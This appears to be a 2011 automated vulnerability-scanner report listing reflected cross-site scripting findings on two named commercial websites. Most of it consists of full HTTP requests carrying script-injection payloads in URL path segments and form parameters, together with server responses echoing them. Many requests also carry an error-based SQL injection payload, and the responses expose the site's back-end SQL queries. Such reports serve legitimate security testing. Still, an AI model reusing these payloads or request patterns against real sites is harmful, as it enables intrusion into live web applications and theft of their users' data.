GET /ppc/leadflow/hins00/leadflow/hins00/project.php?catId='+OR+'ns'%3d'ns&iusrc=34dd63"><script>alert(1)</script>53698cadc19 HTTP/1.1 Host: www.insideup.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __utmz=253555158.1300018899.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/13; _msuuid_zbygse58m0=0291FF4C-46CC-491C-85AD-35386C724DCE; OAID=f3931b205fed176e3aba403e9465c710; __unam=85a0ee8-12eaf3cfa61-6a1761aa-2; __utma=253555158.1232491105.1300018899.1300018899.1300065868.2
Response
HTTP/1.1 200 OK Date: Fri, 25 Mar 2011 19:16:30 GMT Server: Apache/2.2.9 (Fedora) X-Powered-By: PHP/5.2.6 P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 47863
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <base href="http://www ...[SNIP]... <input type="hidden" name="iusrc" value="34dd63"><script>alert(1)</script>53698cadc19 "> ...[SNIP]...
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b6306'%3balert(1)//ea983b03af0 was submitted in the REST URL parameter 2. This input was echoed as b6306';alert(1)//ea983b03af0 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /ppc/leadflowb6306'%3balert(1)//ea983b03af0/hins00/project.php?catId=50002&iusrc=%27%2B(select+1+and+row(1%2c1)%3E(select+count(*)%2cconcat(CONCAT(CHAR(95)%2CCHAR(33)%2CCHAR(64)%2CCHAR(52)%2CCHAR(100)%2CCHAR(105)%2CCHAR(108)%2CCHAR(101)%2CCHAR(109)%2CCHAR(109)%2CCHAR(97))%2c0x3a%2cfloor(rand()*2))x+from+(select+1+union+select+2)a+group+by+x+limit+1))%2B%27 HTTP/1.1 Host: www.insideup.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __utmz=253555158.1300018899.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/13; _msuuid_zbygse58m0=0291FF4C-46CC-491C-85AD-35386C724DCE; OAID=f3931b205fed176e3aba403e9465c710; __unam=85a0ee8-12eaf3cfa61-6a1761aa-2; PHPSESSID=vov3lvi3rnk1p5rdd8gdke24o1; __utma=253555158.1232491105.1300018899.1300065868.1301080607.3; __utmc=253555158; __utmb=253555158.1.10.1301080607
Response
HTTP/1.1 200 OK Date: Fri, 25 Mar 2011 19:20:23 GMT Server: Apache/2.2.9 (Fedora) X-Powered-By: PHP/5.2.6 P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Content-Length: 5333 Connection: close Content-Type: text/html; charset=UTF-8
select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflowb6306';alert(1)//ea983b03af0/hins00/project.php?catId=50002&iusrc='+(select 1 and row(1,1)> ...[SNIP]...
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload beb88'%3balert(1)//2d44c5a2fc8 was submitted in the REST URL parameter 3. This input was echoed as beb88';alert(1)//2d44c5a2fc8 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /ppc/leadflow/hins00beb88'%3balert(1)//2d44c5a2fc8/project.php?catId=50002&iusrc=%27%2B(select+1+and+row(1%2c1)%3E(select+count(*)%2cconcat(CONCAT(CHAR(95)%2CCHAR(33)%2CCHAR(64)%2CCHAR(52)%2CCHAR(100)%2CCHAR(105)%2CCHAR(108)%2CCHAR(101)%2CCHAR(109)%2CCHAR(109)%2CCHAR(97))%2c0x3a%2cfloor(rand()*2))x+from+(select+1+union+select+2)a+group+by+x+limit+1))%2B%27 HTTP/1.1 Host: www.insideup.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __utmz=253555158.1300018899.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/13; _msuuid_zbygse58m0=0291FF4C-46CC-491C-85AD-35386C724DCE; OAID=f3931b205fed176e3aba403e9465c710; __unam=85a0ee8-12eaf3cfa61-6a1761aa-2; PHPSESSID=vov3lvi3rnk1p5rdd8gdke24o1; __utma=253555158.1232491105.1300018899.1300065868.1301080607.3; __utmc=253555158; __utmb=253555158.1.10.1301080607
Response
HTTP/1.1 200 OK Date: Fri, 25 Mar 2011 19:20:48 GMT Server: Apache/2.2.9 (Fedora) X-Powered-By: PHP/5.2.6 P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Content-Length: 5333 Connection: close Content-Type: text/html; charset=UTF-8
select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/hins00beb88';alert(1)//2d44c5a2fc8/project.php?catId=50002&iusrc='+(select 1 and row(1,1)> ...[SNIP]...
The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5f34e'%3balert(1)//49eac350b90 was submitted in the REST URL parameter 4. This input was echoed as 5f34e';alert(1)//49eac350b90 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /ppc/leadflow/hins00/project.php5f34e'%3balert(1)//49eac350b90?catId=50002&iusrc=%27%2B(select+1+and+row(1%2c1)%3E(select+count(*)%2cconcat(CONCAT(CHAR(95)%2CCHAR(33)%2CCHAR(64)%2CCHAR(52)%2CCHAR(100)%2CCHAR(105)%2CCHAR(108)%2CCHAR(101)%2CCHAR(109)%2CCHAR(109)%2CCHAR(97))%2c0x3a%2cfloor(rand()*2))x+from+(select+1+union+select+2)a+group+by+x+limit+1))%2B%27 HTTP/1.1 Host: www.insideup.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __utmz=253555158.1300018899.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/13; _msuuid_zbygse58m0=0291FF4C-46CC-491C-85AD-35386C724DCE; OAID=f3931b205fed176e3aba403e9465c710; __unam=85a0ee8-12eaf3cfa61-6a1761aa-2; PHPSESSID=vov3lvi3rnk1p5rdd8gdke24o1; __utma=253555158.1232491105.1300018899.1300065868.1301080607.3; __utmc=253555158; __utmb=253555158.1.10.1301080607
Response
HTTP/1.1 200 OK Date: Fri, 25 Mar 2011 19:21:08 GMT Server: Apache/2.2.9 (Fedora) X-Powered-By: PHP/5.2.6 P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Content-Length: 5333 Connection: close Content-Type: text/html; charset=UTF-8
select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/hins00/project.php5f34e';alert(1)//49eac350b90?catId=50002&iusrc='+(select 1 and row(1,1)> ...[SNIP]...
The value of the catId request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e1ac5'%3balert(1)//63a331a2c77 was submitted in the catId parameter. This input was echoed as e1ac5';alert(1)//63a331a2c77 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /ppc/leadflow/hins00/project.php?catId=50002e1ac5'%3balert(1)//63a331a2c77&iusrc=%27%2B(select+1+and+row(1%2c1)%3E(select+count(*)%2cconcat(CONCAT(CHAR(95)%2CCHAR(33)%2CCHAR(64)%2CCHAR(52)%2CCHAR(100)%2CCHAR(105)%2CCHAR(108)%2CCHAR(101)%2CCHAR(109)%2CCHAR(109)%2CCHAR(97))%2c0x3a%2cfloor(rand()*2))x+from+(select+1+union+select+2)a+group+by+x+limit+1))%2B%27 HTTP/1.1 Host: www.insideup.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __utmz=253555158.1300018899.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/13; _msuuid_zbygse58m0=0291FF4C-46CC-491C-85AD-35386C724DCE; OAID=f3931b205fed176e3aba403e9465c710; __unam=85a0ee8-12eaf3cfa61-6a1761aa-2; PHPSESSID=vov3lvi3rnk1p5rdd8gdke24o1; __utma=253555158.1232491105.1300018899.1300065868.1301080607.3; __utmc=253555158; __utmb=253555158.1.10.1301080607
Response
HTTP/1.1 200 OK Date: Fri, 25 Mar 2011 19:16:36 GMT Server: Apache/2.2.9 (Fedora) X-Powered-By: PHP/5.2.6 P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Content-Length: 5333 Connection: close Content-Type: text/html; charset=UTF-8
select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/hins00/project.php?catId=50002e1ac5';alert(1)//63a331a2c77&iusrc='+(select 1 and row(1,1)> ...[SNIP]...
The value of the iusrc request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f0cdd"><script>alert(1)</script>6d45ca83c0c was submitted in the iusrc parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /ppc/leadflow/hins00/project.php?catId=50002&iusrc=f0cdd"><script>alert(1)</script>6d45ca83c0c HTTP/1.1 Host: www.insideup.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __utmz=253555158.1300018899.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/13; _msuuid_zbygse58m0=0291FF4C-46CC-491C-85AD-35386C724DCE; OAID=f3931b205fed176e3aba403e9465c710; __unam=85a0ee8-12eaf3cfa61-6a1761aa-2; PHPSESSID=vov3lvi3rnk1p5rdd8gdke24o1; __utma=253555158.1232491105.1300018899.1300065868.1301080607.3; __utmc=253555158; __utmb=253555158.1.10.1301080607
Response
HTTP/1.1 200 OK Date: Fri, 25 Mar 2011 19:16:48 GMT Server: Apache/2.2.9 (Fedora) X-Powered-By: PHP/5.2.6 P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 53862
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <base href="http://www ...[SNIP]... <input type="hidden" name="iusrc" value="f0cdd"><script>alert(1)</script>6d45ca83c0c "> ...[SNIP]...
The value of the iusrc request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 77a25'%3balert(1)//b75a0f29006 was submitted in the iusrc parameter. This input was echoed as 77a25';alert(1)//b75a0f29006 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /ppc/leadflow/hins00/project.php?catId=50002&iusrc=%27%2B(select+1+and+row(1%2c1)%3E(select+count(*)%2cconcat(CONCAT(CHAR(95)%2CCHAR(33)%2CCHAR(64)%2CCHAR(52)%2CCHAR(100)%2CCHAR(105)%2CCHAR(108)%2CCHAR(101)%2CCHAR(109)%2CCHAR(109)%2CCHAR(97))%2c0x3a%2cfloor(rand()*2))x+from+(select+1+union+select+2)a+group+by+x+limit+1))%2B%2777a25'%3balert(1)//b75a0f29006 HTTP/1.1 Host: www.insideup.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __utmz=253555158.1300018899.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/13; _msuuid_zbygse58m0=0291FF4C-46CC-491C-85AD-35386C724DCE; OAID=f3931b205fed176e3aba403e9465c710; __unam=85a0ee8-12eaf3cfa61-6a1761aa-2; PHPSESSID=vov3lvi3rnk1p5rdd8gdke24o1; __utma=253555158.1232491105.1300018899.1300065868.1301080607.3; __utmc=253555158; __utmb=253555158.1.10.1301080607
Response
HTTP/1.1 200 OK Date: Fri, 25 Mar 2011 19:16:50 GMT Server: Apache/2.2.9 (Fedora) X-Powered-By: PHP/5.2.6 P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Content-Length: 5333 Connection: close Content-Type: text/html; charset=UTF-8
select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lea ...[SNIP]... (*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'77a25';alert(1)//b75a0f29006' OR prj.project_page_url = 'leadflow/hins00/project.php?catId=50002&iusrc='+(select 1 and row(1,1)> ...[SNIP]...
5.89. http://www.insideup.com/ppc/leadflow/hins00/project.php [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.insideup.com
Path:
/ppc/leadflow/hins00/project.php
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 84466'%3balert(1)//201a5427a00 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 84466';alert(1)//201a5427a00 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /ppc/leadflow/hins00/project.php?catId=50002&iusrc=%27%2B(select+1+and+row(1%2c1)%3E(select+count(*)%2cconcat(CONCAT(CHAR(95)%2CCHAR(33)%2CCHAR(64)%2CCHAR(52)%2CCHAR(100)%2CCHAR(105)%2CCHAR(108)%2CCHAR(101)%2CCHAR(109)%2CCHAR(109)%2CCHAR(97))%2c0x3a%2cfloor(rand()*2))x+from+(select+1+union+select+2)a+group+by+x+limit+1))%2B%27&84466'%3balert(1)//201a5427a00=1 HTTP/1.1 Host: www.insideup.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __utmz=253555158.1300018899.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/13; _msuuid_zbygse58m0=0291FF4C-46CC-491C-85AD-35386C724DCE; OAID=f3931b205fed176e3aba403e9465c710; __unam=85a0ee8-12eaf3cfa61-6a1761aa-2; PHPSESSID=vov3lvi3rnk1p5rdd8gdke24o1; __utma=253555158.1232491105.1300018899.1300065868.1301080607.3; __utmc=253555158; __utmb=253555158.1.10.1301080607
Response
HTTP/1.1 200 OK Date: Fri, 25 Mar 2011 19:19:30 GMT Server: Apache/2.2.9 (Fedora) X-Powered-By: PHP/5.2.6 P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Content-Length: 5363 Connection: close Content-Type: text/html; charset=UTF-8
select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lea ...[SNIP]... *),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'&84466';alert(1)//201a5427a00=1' OR prj.project_page_url = 'leadflow/hins00/project.php?catId=50002&iusrc='+(select 1 and row(1,1)> ...[SNIP]...
The value of the account_id request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6e0c2"><script>alert(1)</script>e1fa66e6668 was submitted in the account_id parameter. This input was echoed as 6e0c2\"><script>alert(1)</script>e1fa66e6668 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /shop/?count_calendar2011=0&count_cup=0&count_ballpen=0&count_keychain=3&count_writingpad_a5=0&count_shipping=1&account_id=6e0c2"><script>alert(1)</script>e1fa66e6668&billc_organization=&billc_sex=&billc_title=&billc_firstname=&billc_lastname=&billc_birthdate=&billc_street1=&billc_street2=&billc_zipcode=&billc_city=&billc_country=DE&billc_phone=&billc_fax=&billc_email=&payment_invoice_type=invoice&payment_invoice_type=email&terms_and_conditions=accepted&right_of_withdrawal=accepted&order=Abschicken HTTP/1.1 Host: www.manitu.de Proxy-Connection: keep-alive Referer: http://www.manitu.de/shop/ User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The value of the billc_birthdate request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c905c"><script>alert(1)</script>e53c535973d was submitted in the billc_birthdate parameter. This input was echoed as c905c\"><script>alert(1)</script>e53c535973d in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /shop/?count_calendar2011=0&count_cup=0&count_ballpen=0&count_keychain=3&count_writingpad_a5=0&count_shipping=1&account_id=&billc_organization=&billc_sex=&billc_title=&billc_firstname=&billc_lastname=&billc_birthdate=c905c"><script>alert(1)</script>e53c535973d&billc_street1=&billc_street2=&billc_zipcode=&billc_city=&billc_country=DE&billc_phone=&billc_fax=&billc_email=&payment_invoice_type=invoice&payment_invoice_type=email&terms_and_conditions=accepted&right_of_withdrawal=accepted&order=Abschicken HTTP/1.1 Host: www.manitu.de Proxy-Connection: keep-alive Referer: http://www.manitu.de/shop/ User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The value of the billc_city request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2308d"><script>alert(1)</script>11be4decd10 was submitted in the billc_city parameter. This input was echoed as 2308d\"><script>alert(1)</script>11be4decd10 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /shop/?count_calendar2011=0&count_cup=0&count_ballpen=0&count_keychain=3&count_writingpad_a5=0&count_shipping=1&account_id=&billc_organization=&billc_sex=&billc_title=&billc_firstname=&billc_lastname=&billc_birthdate=&billc_street1=&billc_street2=&billc_zipcode=&billc_city=2308d"><script>alert(1)</script>11be4decd10&billc_country=DE&billc_phone=&billc_fax=&billc_email=&payment_invoice_type=invoice&payment_invoice_type=email&terms_and_conditions=accepted&right_of_withdrawal=accepted&order=Abschicken HTTP/1.1 Host: www.manitu.de Proxy-Connection: keep-alive Referer: http://www.manitu.de/shop/ User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The value of the billc_email request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 18208"><script>alert(1)</script>e2e4d6cdcf4 was submitted in the billc_email parameter. This input was echoed as 18208\"><script>alert(1)</script>e2e4d6cdcf4 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /shop/?count_calendar2011=0&count_cup=0&count_ballpen=0&count_keychain=3&count_writingpad_a5=0&count_shipping=1&account_id=&billc_organization=&billc_sex=&billc_title=&billc_firstname=&billc_lastname=&billc_birthdate=&billc_street1=&billc_street2=&billc_zipcode=&billc_city=&billc_country=DE&billc_phone=&billc_fax=&billc_email=18208"><script>alert(1)</script>e2e4d6cdcf4&payment_invoice_type=invoice&payment_invoice_type=email&terms_and_conditions=accepted&right_of_withdrawal=accepted&order=Abschicken HTTP/1.1 Host: www.manitu.de Proxy-Connection: keep-alive Referer: http://www.manitu.de/shop/ User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The value of the billc_fax request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1ea4f"><script>alert(1)</script>4612d8d6ccd was submitted in the billc_fax parameter. This input was echoed as 1ea4f\"><script>alert(1)</script>4612d8d6ccd in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /shop/?count_calendar2011=0&count_cup=0&count_ballpen=0&count_keychain=3&count_writingpad_a5=0&count_shipping=1&account_id=&billc_organization=&billc_sex=&billc_title=&billc_firstname=&billc_lastname=&billc_birthdate=&billc_street1=&billc_street2=&billc_zipcode=&billc_city=&billc_country=DE&billc_phone=&billc_fax=1ea4f"><script>alert(1)</script>4612d8d6ccd&billc_email=&payment_invoice_type=invoice&payment_invoice_type=email&terms_and_conditions=accepted&right_of_withdrawal=accepted&order=Abschicken HTTP/1.1 Host: www.manitu.de Proxy-Connection: keep-alive Referer: http://www.manitu.de/shop/ User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The value of the billc_firstname request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a6099"><script>alert(1)</script>2ec26a9320f was submitted in the billc_firstname parameter. This input was echoed as a6099\"><script>alert(1)</script>2ec26a9320f in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /shop/?count_calendar2011=0&count_cup=0&count_ballpen=0&count_keychain=3&count_writingpad_a5=0&count_shipping=1&account_id=&billc_organization=&billc_sex=&billc_title=&billc_firstname=a6099"><script>alert(1)</script>2ec26a9320f&billc_lastname=&billc_birthdate=&billc_street1=&billc_street2=&billc_zipcode=&billc_city=&billc_country=DE&billc_phone=&billc_fax=&billc_email=&payment_invoice_type=invoice&payment_invoice_type=email&terms_and_conditions=accepted&right_of_withdrawal=accepted&order=Abschicken HTTP/1.1 Host: www.manitu.de Proxy-Connection: keep-alive Referer: http://www.manitu.de/shop/ User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The value of the billc_lastname request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cc427"><script>alert(1)</script>88472088dee was submitted in the billc_lastname parameter. This input was echoed as cc427\"><script>alert(1)</script>88472088dee in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /shop/?count_calendar2011=0&count_cup=0&count_ballpen=0&count_keychain=3&count_writingpad_a5=0&count_shipping=1&account_id=&billc_organization=&billc_sex=&billc_title=&billc_firstname=&billc_lastname=cc427"><script>alert(1)</script>88472088dee&billc_birthdate=&billc_street1=&billc_street2=&billc_zipcode=&billc_city=&billc_country=DE&billc_phone=&billc_fax=&billc_email=&payment_invoice_type=invoice&payment_invoice_type=email&terms_and_conditions=accepted&right_of_withdrawal=accepted&order=Abschicken HTTP/1.1 Host: www.manitu.de Proxy-Connection: keep-alive Referer: http://www.manitu.de/shop/ User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
